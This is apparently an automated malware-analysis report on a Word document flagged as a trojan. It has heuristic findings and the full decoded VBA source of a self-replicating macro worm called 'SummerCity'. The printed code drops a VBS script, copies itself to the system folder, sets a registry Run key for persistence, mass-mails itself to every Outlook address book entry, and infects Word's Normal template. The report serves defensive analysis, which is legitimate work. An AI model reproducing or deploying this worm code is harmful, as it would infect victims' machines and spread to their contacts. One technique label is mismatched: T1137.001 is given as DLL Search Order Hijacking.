Verdict: MALICIOUS
Risk Score: 496
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1137.001 DLL Search Order Hijacking
The VBA macro within the document utilizes `WScript.Shell` and `Scripting.FileSystemObject` to copy itself as 'Summer.vbs' to the user's startup folder and then creates a registry Run key at 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Summer' to ensure persistence. This behavior is indicative of a trojan designed to maintain a foothold on the system.
Heuristics (12)

- ClamAV: Win.Trojan.SSIWG-5 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.SSIWG-5
- VBA macros detected [medium, OLE_VBA_MACROS, 7 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
    sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf
    sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write s …
    sStr = sStr + "' Read our code in" + vbCrLf
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched lines in script:
    sStr = sStr + "" + vbCrLf
    sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\§ & §Summer§, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
    sStr = sStr + "" + vbCrLf
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched lines in script:
    sStr = sStr + "" + vbCrLf
    sStr = sStr + "CreateObject( §Scripting.FileSystemObject§ ).CopyFile WScript.ScriptFullName, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
    sStr = sStr + "" + vbCrLf
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call. Matched lines in script:
    sStr = sStr + "' Get Word's Normal Template" + vbCrLf
    sStr = sStr + "Set WordObj = GetObject(§§,§Word.Application§)" + vbCrLf
    sStr = sStr + "If WordObj = §§ Then Set WordObj = CreateObject(§Word.Application§)" + vbCrLf
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Close macro [low, OLE_VBA_AUTOCLOSE]: Auto_Close macro. Matched line in script:
    Private Sub AutoClose()
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched lines in script:
    sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf
    sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write s …
    sStr = sStr + "' Read our code in" + vbCrLf
- Reference to Windows Script Host [high, SC_STR_WSCRIPT]: Reference to Windows Script Host
- Clipboard command execution lure [high, SE_CLIPBOARD_COMMAND_LURE]: Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6754 bytes |

SHA-256: 020feca2cf08f75502b34364e68bd5f6c902f354b9f31e8fc88000f14a87b196
Detection: ClamAV: Win.Trojan.SSIWG-5
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "SummerCity"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub AutoClose()
Dim sStr As String
sStr = ""
sStr = sStr + "' Summer" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "On Error Resume Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "Dim A02" + vbCrLf
sStr = sStr + "Dim A06" + vbCrLf
sStr = sStr + "Dim A07" + vbCrLf
sStr = sStr + "Dim A05" + vbCrLf
sStr = sStr + "Dim A09" + vbCrLf
sStr = sStr + "Dim A10" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §Scripting.FileSystemObject§ ).CopyFile WScript.ScriptFullName, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\§ & §Summer§, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "A04 = CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "If CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = §§ Or CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) > 20 Then" + vbCrLf
sStr = sStr + " CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "If CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0 Then" + vbCrLf
sStr = sStr + " Set A05 = CreateObject( §Outlook.Application§ )" + vbCrLf
sStr = sStr + " Set A06 = A05.GetNameSpace( §MAPI§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " For Each A07 In A06.AddressLists" + vbCrLf
sStr = sStr + " Set A08 = A05.CreateItem( 0 )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " For A09 = 1 To A07.AddressEntries.Count" + vbCrLf
sStr = sStr + " Set A10 = A07.AddressEntries( A09 )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " If A09 = 1 Then" + vbCrLf
sStr = sStr + " A08.BCC = A10.Address" + vbCrLf
sStr = sStr + " Else" + vbCrLf
sStr = sStr + " A08.BCC = A08.BCC & §; § & A10.Address" + vbCrLf
sStr = sStr + " End If" + vbCrLf
sStr = sStr + " Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " A08.Subject = §Hottest Summer News§" + vbCrLf
sStr = sStr + " A08.Body = §Go to the beach and have fun§" + vbCrLf
sStr = sStr + " A08.Attachments.Add WScript.ScriptFullName" + vbCrLf
sStr = sStr + " A08.DeleteAfterSubmit = True" + vbCrLf
sStr = sStr + " A08.Send" + vbCrLf
sStr = sStr + " Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\§ & §Summer§, CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) + 1" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf
sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write sStr§+vbCRLF+§Script.Close§+vbCRLF+§winFolder = Environ(§+Chr(34)+§WINDIR§+Chr(34)+§)§+vbCRLF+§'Shell winFolder + §+Chr(34)+§\export.vbs§+Chr(34)+§, 0§+vbCRLF+vbCRLF+§End Sub§+vbCRLF" + vbCrLf
sStr = sStr + "' Read our code in" + vbCrLf
sStr = sStr + "Set fso = CreateObject(§Scripting.FileSystemObject§)" + vbCrLf
sStr = sStr + "Set f = fso.OpenTextFile(Wscript.ScriptFullName, 1)" + vbCrLf
sStr = sStr + "WordVirus = f.Readall()" + vbCrLf
sStr = sStr + "f.Close" + vbCrLf
sStr = sStr + "' Replace any quotes" + vbCrLf
sStr = sStr + "WordVirus = Replace(WordVirus, Chr(34), Chr(167))" + vbCrLf
sStr = sStr + "lines = Split(WordVirus, vbCRLF)" + vbCrLf
sStr = sStr + "For n = 0 to Ubound(lines)" + vbCrLf
sStr = sStr + " lines(n) = §sStr=sStr+§ & Chr(34) & lines(n) & Chr(34) & §+vbCRLF§" + vbCrLf
sStr = sStr + "Next" + vbCrLf
sStr = sStr + "' Get Word's Normal Template" + vbCrLf
sStr = sStr + "Set WordObj = GetObject(§§,§Word.Application§)" + vbCrLf
sStr = sStr + "If WordObj = §§ Then Set WordObj = CreateObject(§Word.Application§)" + vbCrLf
sStr = sStr + "WordObj.Visible = True" + vbCrLf
sStr = sStr + "WordObj.Activate" + vbCrLf
sStr = sStr + "WordObj.Options.SaveNormalPrompt = False" + vbCrLf
sStr = sStr + "Set NTI1 = WordObj.NormalTemplate.VBProject.VBComponents.Item(1)" + vbCrLf
sStr = sStr + "' Infect Normal Template" + vbCrLf
sStr = sStr + "If NTI1.Name <> §SummerCity§ Then" + vbCrLf
sStr = sStr + " NTI1.CodeModule.DeleteLines 1, NTI1.CodeModule.CountOfLines" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, sFooter" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, Join(lines, vbCRLF)" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, sHeader" + vbCrLf
sStr = sStr + " NTI1.Name = §SummerCity§" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "' Clean up" + vbCrLf
sStr = sStr + "set NTI1 = Nothing" + vbCrLf
sStr = sStr + "set WordObj = Nothing" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "" + vbCrLf
Dim sFind As Long
idx = 1
sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)
While sFind
Mid(sStr, sFind, 1) = Chr(34)
sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)
Wend
Set fso = CreateObject("Scripting.FileSystemObject")
Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), "export.vbs"), True)
Script.Write sStr
Script.Close
winFolder = Environ("WINDIR")
'Shell winFolder + "\export.vbs", 0
End Sub